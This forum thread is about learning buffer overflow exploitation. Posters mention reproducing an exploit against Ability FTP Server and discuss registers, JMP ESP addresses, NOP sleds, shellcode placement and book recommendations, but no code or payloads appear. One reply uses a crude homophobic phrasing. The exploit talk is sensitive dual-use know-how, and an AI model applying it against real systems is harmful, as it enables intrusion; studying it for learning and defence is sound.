Results 1 to 10 of 10

Thread: Buffer Overflow Guidance

  1. #1
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default Buffer Overflow Guidance

    Hallo all,

    I am planning to concentrate on studying BOF, I have read some tutorials, and were able to recreate attacks using BOF. However, I would like to have deeper understanding on Processor Registers (EIP,ESP,EBP,...), also to know the difference between exit methods (SEH, Thread,...).

    So expertise here, would do you advise me to read, or from where to begin.
    Your contribution is highly appreciated

    Thanks in advance,

  2. #2
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by l1nuxant_ee View Post
    Hallo all,

    I am planning to concentrate on studying BOF, I have read some tutorials, and were able to recreate attacks using BOF. However, I would like to have deeper understanding on Processor Registers (EIP,ESP,EBP,...), also to know the difference between exit methods (SEH, Thread,...).

    So expertise here, would do you advise me to read, or from where to begin.
    Your contribution is highly appreciated

    Thanks in advance,
    I'd be glad to give you some in depth information (first hand experience, basic methodology, etc) here if you'd like. Can you provide some specific areas that you'd like to focus on? I know you said registers, pointers, and exit calls, but really that's a pretty small part of the whole shellcode/scripting/BOF field. Are you familiar with the variations of heap/stack/etc attacks and the intricates of memory addressing, at least as far as locating the applicable address(es), building the "appropriate" sized NOP sled, and delivery methods? Also, are you more interested in, say, Perl structured attacks, C++, etc........



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  3. #3
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by ShadowKill View Post
    I'd be glad to give you some in depth information (first hand experience, basic methodology, etc) here if you'd like. Can you provide some specific areas that you'd like to focus on? I know you said registers, pointers, and exit calls, but really that's a pretty small part of the whole shellcode/scripting/BOF field. Are you familiar with the variations of heap/stack/etc attacks and the intricates of memory addressing, at least as far as locating the applicable address(es), building the "appropriate" sized NOP sled, and delivery methods? Also, are you more interested in, say, Perl structured attacks, C++, etc........
    Thanks alot ShadowKill for this response.

    I have recreated the BOF on ability ftp server. I understood how it worked, how to get the JMP ESP address, where to put my shellcode, and how to use the NOPs to fill the gaps. But when I tried to recreate BOF for other applications (such as WinGate, Savant) I encountered difficulties (as the exploit needed certain bytes at the begining of my evil packet) so I thought of focusing on the registers, as I dont know the purpose of the ESP, EBP till know.

    I have read about the Heap/Stack attacks (from the wikipedia), and somehow understood the difference between them.

    I have been able to use both Python & Perl attacks, but I think I wont have problem with using C++.

    Overall, I find my self at the starting of this field, and really I found myself loving it, so this is why I would like to get inside it.

    Thanks alot again,

  4. #4
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Dears,

    Anyone knows a got book related to this topic ?

  5. #5
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    All though the title is pretty gay sounding this book is a excellent read.

    http://www.amazon.com/Hacking-Art-Ex...1894923&sr=8-1

  6. #6
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by pureh@te View Post
    All though the title is pretty gay sounding this book is a excellent read.

    http://www.amazon.com/Hacking-Art-Ex...1894923&sr=8-1

    Excellent book PureH@te, I actually got my copy of the First Edition signed at Defcon some years ago, DC12 I believe.

    From what I've seen so far I believe that the First Edition of the same book would benefit you more than the second. It is more technical and goes further into the inner workings of BOFs and their application in various areas such as networking, wired and wireless, as well as others. The Second Edition is more for beginners and those interesting in Object Oriented programming methodologies. I will put up a tutorial, of sorts, on overflowing as well as basic assembly manipulation, etc sometime soon.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  7. #7
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by ShadowKill View Post
    Excellent book PureH@te, I actually got my copy of the First Edition signed at Defcon some years ago, DC12 I believe.

    From what I've seen so far I believe that the First Edition of the same book would benefit you more than the second. It is more technical and goes further into the inner workings of BOFs and their application in various areas such as networking, wired and wireless, as well as others. The Second Edition is more for beginners and those interesting in Object Oriented programming methodologies. I will put up a tutorial, of sorts, on overflowing as well as basic assembly manipulation, etc sometime soon.
    Thanks PureH@te for the book, I will check it.

    ShadowKill, I will be waiting your tutorial, so please don't be late

  8. #8
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default Help on BOF with ability server

    Hello you guys
    I need some help please...

    l1nuxant_ee you said:
    "I have recreated the BOF on ability ftp server"

    I'm trying to do the same in a XP SP2 box, with no success...

    Is this possible?

    I don't even get to recreate the simple-fuzzer.py script...

    I get no crash... what I'm i doing wrong??

    Could you guys help?

    thanks in advance.

  9. #9
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by Armagedeon View Post
    Hello you guys
    I need some help please...

    l1nuxant_ee you said:
    "I have recreated the BOF on ability ftp server"

    I'm trying to do the same in a XP SP2 box, with no success...

    Is this possible?

    I don't even get to recreate the simple-fuzzer.py script...

    I get no crash... what I'm i doing wrong??

    Could you guys help?

    thanks in advance.
    Armagedeon, please do not hijack other people's threads. Create you own thread, ask the question there, and others will respond. This thread is for the OP's question(s), not yours. Thanks.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  10. #10
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Sorry,

    Just posted it here because I thought it was within the scope of the subject...
    Will take in consideration your advise..
    Thanks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •